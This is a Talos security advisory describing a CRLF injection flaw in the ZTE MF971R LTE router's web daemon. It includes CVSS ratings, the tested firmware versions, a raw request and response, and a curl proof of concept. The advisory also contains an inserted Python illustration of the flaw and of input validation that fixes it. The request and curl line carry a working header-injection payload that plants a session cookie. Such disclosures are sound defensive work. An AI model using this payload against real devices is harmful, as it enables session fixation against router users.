TALOS-2021-1313
History: Oct 18, 2021 - 12:00 a.m.

ZTE MF971R HTTP_HOST CRLF Injection vulnerability

2021-10-18 00:00:00
Talos Intelligence
www.talosintelligence.com
Tags: zte mf971r, crlf injection, http daemon

CVSS2: 4.3
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3: 4.3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

EPSS: 0.003
Percentile: 70.7%

Summary

An exploitable CRLF injection vulnerability exists in ZTE MF971R LTE router version wa_inner_version:BD_PLKPLMF971R1V1.0.0B06. A specially-crafted HTTP request can cause a CRLF injection. An attacker needs to provide a URL to the victim to trigger the vulnerability.

Tested Versions

ZTE Corporation MF971R wa_inner_version:BD_LVWRGBMF971RV1.0.0B01
ZTE Corporation MF971R wa_inner_version:BD_PLKPLMF971R1V1.0.0B06
ZTE Corporation MF971R zte_topsw_goahead - MD5 B2176B393A97B5BA13791FC591D2BE3F
ZTE Corporation MF971R zte_topsw_goahead - MD5 bf5ada32c9e8c815bfd51bfb5b8391cb

Product URLs

https://www.ztedevices.com/pl/product/zte-mf971r/

CVSSv3 Score

6.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

CWE

CWE-113 - Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

Details

The MF971R is a portable router with Wi-Fi support and an LTE/GSM modem.

This vulnerability is present in the HTTP_HOST parameter handled by the ZTE MF971R zte_topsw_goahead HTTP daemon/web application. A specially-crafted URL sent by an attacker and visited by a victim can lead to CRLF injection.

The HTTP_HOST parameter passed via the GET method to the zte_topsw_goahead daemon is not sanitized of special characters. The value delivered with this parameter is later used in the response's Location header. Because it is not sanitized, an attacker can inject \r\n sequences and exploit this in a few different ways.

Below is an example of an attacker setting a session cookie to their own value (i.e. session fixation):

Request:

GET /?HTTP_HOST=%0d%0aSet-Cookie%3a%20stok=45BD8566DAEB75D2796134AA%0d%0aX-Magic:%20 HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://evil.localdomain/127.0.0.1.html
Connection: close

Response:

HTTP/1.1 302 Redirect
Server: WebServer-Webs
Date: Wed Apr 28 04:33:05 2021
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Location: http://192.168.2.1 
Set-Cookie: stok=45BD8566DAEB75D2796134AA
X-Magic: /index.html

<html><head></head><body>
		This document has moved to a new <a href="http://192.168.2.1      Set-Cookie: stok=45BD8566DAEB75D2796134AA     X-Magic: /index.html">location</a>.
		Please update your documents to reflect the new location.
		</body></html>

The victim does not need to be logged-in to be affected by this vulnerability.
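The following Python is an added illustration, not the advisory's or the vendor's code: it models the flaw in simplified form (the percent-decoded HTTP_HOST value is concatenated into the Location header with no check for CR/LF), parses the result the way a browser would so the injected Set-Cookie shows up as its own header, and shows the validation a fixed daemon needs before placing the value in a header. The "http://192.168.2.1" prefix and the host[:port] allowlist are assumptions about the legitimate shape of the value.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request target reproducing the advisory's payload (not captured traffic).
SAMPLE_TARGET = ("/?HTTP_HOST=%0d%0aSet-Cookie%3a%20stok="
                 "45BD8566DAEB75D2796134AA%0d%0aX-Magic:%20")


def http_host_from_target(target: str) -> str:
    """Percent-decode the HTTP_HOST query parameter, as the daemon has to."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return params.get("HTTP_HOST", [""])[0]


def vulnerable_redirect(http_host: str) -> bytes:
    """Simplified model of the flaw: the decoded value is concatenated into the
    Location header unchecked (the exact concatenation is an assumption)."""
    return (b"HTTP/1.1 302 Redirect\r\n"
            b"Location: http://192.168.2.1" + http_host.encode("latin-1") +
            b"/index.html\r\n\r\n")


def parse_header_block(raw: bytes) -> dict:
    """Parse a response the way a client would: every CRLF ends a header line."""
    head = raw.partition(b"\r\n\r\n")[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1")] = value.strip().decode("latin-1")
    return headers


# Allowlist for a host[:port] value (assumed shape of a legitimate HTTP_HOST).
_HOST_RE = re.compile(r"[A-Za-z0-9.\-]{0,253}(:[0-9]{1,5})?")


def is_safe_http_host(http_host: str) -> bool:
    """Reject control characters (CR, LF and the rest of C0/DEL) and anything
    outside the host allowlist, so no value can end or start a header."""
    if re.search(r"[\x00-\x1f\x7f]", http_host):
        return False
    return _HOST_RE.fullmatch(http_host) is not None


def safe_redirect(http_host: str) -> bytes:
    """Hardened variant: same header construction, but only after validation."""
    if not is_safe_http_host(http_host):
        raise ValueError("HTTP_HOST contains characters not allowed in a header")
    return vulnerable_redirect(http_host)   # safe only because the value was validated
```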

Exploit Proof of Concept

curl -i -s -k -X $'GET' \
	-H $'Host: 192.168.2.1' \
	$'http://192.168.2.1/?HTTP_HOST=%0d%0aSet-Cookie%3a%20stok=45BD8566DAEB75D2796134AA%0d%0aX-Magic:%20'

Timeline

2021-06-15 - Vendor disclosure
2021-09-14 - Disclosure extension granted
2021-10-15 - Vendor patched
2021-10-18 - Public release
